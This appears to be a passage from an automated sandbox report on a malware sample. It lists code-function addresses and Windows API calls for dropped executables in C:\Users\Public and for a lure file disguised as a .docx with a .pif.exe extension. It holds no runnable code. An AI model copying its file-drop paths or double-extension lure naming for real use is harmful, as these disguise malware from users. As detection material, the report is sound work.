Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, | 10_2_00007FF64B563D94 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, | 10_2_00007FF64B591538 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken, | 10_2_00007FF64B5789E4 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, | 12_2_00007FF64B578114 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, | 12_2_00007FF64B58BCF0 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, | 12_2_00007FF64B5788C0 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, | 12_2_00007FF64B577FF8 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B57898C NtQueryInformationToken, | 12_2_00007FF64B57898C |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, | 12_2_00007FF64B563D94 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, | 12_2_00007FF64B591538 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken, | 12_2_00007FF64B5789E4 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, | 14_2_00007FF64B578114 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, | 14_2_00007FF64B58BCF0 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, | 14_2_00007FF64B5788C0 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, | 14_2_00007FF64B577FF8 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B57898C NtQueryInformationToken, | 14_2_00007FF64B57898C |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, | 14_2_00007FF64B563D94 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, | 14_2_00007FF64B591538 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken, | 14_2_00007FF64B5789E4 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, | 17_2_00007FF64B578114 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, | 17_2_00007FF64B58BCF0 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, | 17_2_00007FF64B5788C0 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, | 17_2_00007FF64B577FF8 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B57898C NtQueryInformationToken, | 17_2_00007FF64B57898C |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, | 17_2_00007FF64B563D94 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, | 17_2_00007FF64B591538 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken, | 17_2_00007FF64B5789E4 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A09890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey, | 24_2_00007FF7E0A09890 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029820C4 | 0_2_029820C4 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_0040E800 | 3_2_0040E800 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_0040C838 | 3_2_0040C838 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_0040F1CA | 3_2_0040F1CA |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_00411250 | 3_2_00411250 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_004102D0 | 3_2_004102D0 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_0040B2E7 | 3_2_0040B2E7 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_004102F0 | 3_2_004102F0 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_004105F0 | 3_2_004105F0 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_00410673 | 3_2_00410673 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_004106B9 | 3_2_004106B9 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_0040E800 | 3_1_0040E800 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_0040C838 | 3_1_0040C838 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_0040F1CA | 3_1_0040F1CA |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_00411250 | 3_1_00411250 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_004102D0 | 3_1_004102D0 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_0040B2E7 | 3_1_0040B2E7 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_004102F0 | 3_1_004102F0 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_004105F0 | 3_1_004105F0 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_00410673 | 3_1_00410673 |
Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_1_004106B9 | 3_1_004106B9 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B567D30 | 8_2_00007FF64B567D30 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5737D8 | 8_2_00007FF64B5737D8 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56AA54 | 8_2_00007FF64B56AA54 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B575554 | 8_2_00007FF64B575554 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B561884 | 8_2_00007FF64B561884 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B562C48 | 8_2_00007FF64B562C48 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B577854 | 8_2_00007FF64B577854 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B58AC4C | 8_2_00007FF64B58AC4C |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B568510 | 8_2_00007FF64B568510 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56B0D8 | 8_2_00007FF64B56B0D8 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5718D4 | 8_2_00007FF64B5718D4 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B563F90 | 8_2_00007FF64B563F90 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B565B70 | 8_2_00007FF64B565B70 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B569B50 | 8_2_00007FF64B569B50 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B563410 | 8_2_00007FF64B563410 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B566BE0 | 8_2_00007FF64B566BE0 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B58AFBC | 8_2_00007FF64B58AFBC |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56E680 | 8_2_00007FF64B56E680 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B58EE88 | 8_2_00007FF64B58EE88 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B570A6C | 8_2_00007FF64B570A6C |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B565240 | 8_2_00007FF64B565240 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56D250 | 8_2_00007FF64B56D250 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B569E50 | 8_2_00007FF64B569E50 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B567650 | 8_2_00007FF64B567650 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56372C | 8_2_00007FF64B56372C |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B587F00 | 8_2_00007FF64B587F00 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B566EE4 | 8_2_00007FF64B566EE4 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B591538 | 8_2_00007FF64B591538 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B574224 | 8_2_00007FF64B574224 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B562220 | 8_2_00007FF64B562220 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B58AA30 | 8_2_00007FF64B58AA30 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B564A30 | 8_2_00007FF64B564A30 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B568DF8 | 8_2_00007FF64B568DF8 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B56CE10 | 8_2_00007FF64B56CE10 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B58D9D0 | 8_2_00007FF64B58D9D0 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5681D4 | 8_2_00007FF64B5681D4 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B567D30 | 10_2_00007FF64B567D30 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5737D8 | 10_2_00007FF64B5737D8 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B56AA54 | 10_2_00007FF64B56AA54 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B575554 | 10_2_00007FF64B575554 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B561884 | 10_2_00007FF64B561884 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B562C48 | 10_2_00007FF64B562C48 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B577854 | 10_2_00007FF64B577854 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B58AC4C | 10_2_00007FF64B58AC4C |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B568510 | 10_2_00007FF64B568510 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B56B0D8 | 10_2_00007FF64B56B0D8 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5718D4 | 10_2_00007FF64B5718D4 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B563F90 | 10_2_00007FF64B563F90 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B565B70 | 10_2_00007FF64B565B70 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B569B50 | 10_2_00007FF64B569B50 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B563410 | 10_2_00007FF64B563410 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B566BE0 | 10_2_00007FF64B566BE0 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B58AFBC | 10_2_00007FF64B58AFBC |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B56E680 | 10_2_00007FF64B56E680 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B58EE88 | 10_2_00007FF64B58EE88 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B570A6C | 10_2_00007FF64B570A6C |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B565240 | 10_2_00007FF64B565240 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B56D250 | 10_2_00007FF64B56D250 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B569E50 | 10_2_00007FF64B569E50 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B567650 | 10_2_00007FF64B567650 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B56372C | 10_2_00007FF64B56372C |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B587F00 | 10_2_00007FF64B587F00 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B566EE4 | 10_2_00007FF64B566EE4 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B591538 | 10_2_00007FF64B591538 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B574224 | 10_2_00007FF64B574224 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B562220 | 10_2_00007FF64B562220 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B58AA30 | 10_2_00007FF64B58AA30 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B564A30 | 10_2_00007FF64B564A30 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B568DF8 | 10_2_00007FF64B568DF8 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B56CE10 | 10_2_00007FF64B56CE10 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B58D9D0 | 10_2_00007FF64B58D9D0 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5681D4 | 10_2_00007FF64B5681D4 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5737D8 | 12_2_00007FF64B5737D8 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B570A6C | 12_2_00007FF64B570A6C |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B56AA54 | 12_2_00007FF64B56AA54 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B575554 | 12_2_00007FF64B575554 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B574224 | 12_2_00007FF64B574224 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B561884 | 12_2_00007FF64B561884 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B562C48 | 12_2_00007FF64B562C48 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B577854 | 12_2_00007FF64B577854 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B58AC4C | 12_2_00007FF64B58AC4C |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B567D30 | 12_2_00007FF64B567D30 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B568510 | 12_2_00007FF64B568510 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B56B0D8 | 12_2_00007FF64B56B0D8 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5718D4 | 12_2_00007FF64B5718D4 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B563F90 | 12_2_00007FF64B563F90 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B565B70 | 12_2_00007FF64B565B70 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B569B50 | 12_2_00007FF64B569B50 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B563410 | 12_2_00007FF64B563410 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B566BE0 | 12_2_00007FF64B566BE0 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B58AFBC | 12_2_00007FF64B58AFBC |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B56E680 | 12_2_00007FF64B56E680 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B58EE88 | 12_2_00007FF64B58EE88 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B565240 | 12_2_00007FF64B565240 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B56D250 | 12_2_00007FF64B56D250 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B569E50 | 12_2_00007FF64B569E50 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B567650 | 12_2_00007FF64B567650 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B56372C | 12_2_00007FF64B56372C |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B587F00 | 12_2_00007FF64B587F00 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B566EE4 | 12_2_00007FF64B566EE4 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B591538 | 12_2_00007FF64B591538 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B562220 | 12_2_00007FF64B562220 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B58AA30 | 12_2_00007FF64B58AA30 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B564A30 | 12_2_00007FF64B564A30 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B568DF8 | 12_2_00007FF64B568DF8 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B56CE10 | 12_2_00007FF64B56CE10 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B58D9D0 | 12_2_00007FF64B58D9D0 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5681D4 | 12_2_00007FF64B5681D4 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B5737D8 | 14_2_00007FF64B5737D8 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B570A6C | 14_2_00007FF64B570A6C |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B56AA54 | 14_2_00007FF64B56AA54 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B575554 | 14_2_00007FF64B575554 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B574224 | 14_2_00007FF64B574224 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B561884 | 14_2_00007FF64B561884 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B562C48 | 14_2_00007FF64B562C48 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B577854 | 14_2_00007FF64B577854 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B58AC4C | 14_2_00007FF64B58AC4C |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B567D30 | 14_2_00007FF64B567D30 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B568510 | 14_2_00007FF64B568510 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B56B0D8 | 14_2_00007FF64B56B0D8 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B5718D4 | 14_2_00007FF64B5718D4 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B563F90 | 14_2_00007FF64B563F90 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B565B70 | 14_2_00007FF64B565B70 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B569B50 | 14_2_00007FF64B569B50 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B563410 | 14_2_00007FF64B563410 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B566BE0 | 14_2_00007FF64B566BE0 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B58AFBC | 14_2_00007FF64B58AFBC |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B56E680 | 14_2_00007FF64B56E680 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B58EE88 | 14_2_00007FF64B58EE88 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B565240 | 14_2_00007FF64B565240 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B56D250 | 14_2_00007FF64B56D250 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B569E50 | 14_2_00007FF64B569E50 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B567650 | 14_2_00007FF64B567650 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B56372C | 14_2_00007FF64B56372C |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B587F00 | 14_2_00007FF64B587F00 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B566EE4 | 14_2_00007FF64B566EE4 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B591538 | 14_2_00007FF64B591538 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B562220 | 14_2_00007FF64B562220 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B58AA30 | 14_2_00007FF64B58AA30 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B564A30 | 14_2_00007FF64B564A30 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B568DF8 | 14_2_00007FF64B568DF8 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B56CE10 | 14_2_00007FF64B56CE10 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B58D9D0 | 14_2_00007FF64B58D9D0 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B5681D4 | 14_2_00007FF64B5681D4 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B5737D8 | 17_2_00007FF64B5737D8 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B570A6C | 17_2_00007FF64B570A6C |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B56AA54 | 17_2_00007FF64B56AA54 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B575554 | 17_2_00007FF64B575554 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B574224 | 17_2_00007FF64B574224 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B561884 | 17_2_00007FF64B561884 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B562C48 | 17_2_00007FF64B562C48 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B577854 | 17_2_00007FF64B577854 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B58AC4C | 17_2_00007FF64B58AC4C |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B567D30 | 17_2_00007FF64B567D30 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B568510 | 17_2_00007FF64B568510 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B56B0D8 | 17_2_00007FF64B56B0D8 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B5718D4 | 17_2_00007FF64B5718D4 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B563F90 | 17_2_00007FF64B563F90 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B565B70 | 17_2_00007FF64B565B70 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B569B50 | 17_2_00007FF64B569B50 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B563410 | 17_2_00007FF64B563410 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B566BE0 | 17_2_00007FF64B566BE0 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B58AFBC | 17_2_00007FF64B58AFBC |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B56E680 | 17_2_00007FF64B56E680 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B58EE88 | 17_2_00007FF64B58EE88 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B565240 | 17_2_00007FF64B565240 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B56D250 | 17_2_00007FF64B56D250 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B569E50 | 17_2_00007FF64B569E50 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B567650 | 17_2_00007FF64B567650 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B56372C | 17_2_00007FF64B56372C |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B587F00 | 17_2_00007FF64B587F00 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B566EE4 | 17_2_00007FF64B566EE4 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B591538 | 17_2_00007FF64B591538 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B562220 | 17_2_00007FF64B562220 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B58AA30 | 17_2_00007FF64B58AA30 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B564A30 | 17_2_00007FF64B564A30 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B568DF8 | 17_2_00007FF64B568DF8 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B56CE10 | 17_2_00007FF64B56CE10 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B58D9D0 | 17_2_00007FF64B58D9D0 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B5681D4 | 17_2_00007FF64B5681D4 |
Source: C:\Users\Public\xkn.exe | Code function: 22_2_00007FFAAC8B0EF5 | 22_2_00007FFAAC8B0EF5 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A06054 | 24_2_00007FF7E0A06054 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A01664 | 24_2_00007FF7E0A01664 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A0596C | 24_2_00007FF7E0A0596C |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A072C0 | 24_2_00007FF7E0A072C0 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A06EC8 | 24_2_00007FF7E0A06EC8 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A067A0 | 24_2_00007FF7E0A067A0 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A083D8 | 24_2_00007FF7E0A083D8 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A06AE8 | 24_2_00007FF7E0A06AE8 |
Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A04050 | 24_2_00007FF7E0A04050 |
